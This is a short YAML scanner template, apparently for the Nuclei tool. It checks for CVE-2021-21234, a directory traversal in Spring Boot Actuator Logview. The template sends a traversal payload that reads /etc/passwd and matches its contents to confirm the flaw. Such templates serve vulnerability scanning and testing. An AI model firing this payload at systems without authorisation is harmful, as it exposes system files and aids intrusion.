id: CVE-2021-21234

info:
  name: Spring Boot Actuator Logview - Directory Traversal
  author: gy741
  severity: high
  reference: https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234
  tags: cve,cve2021,springboot,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200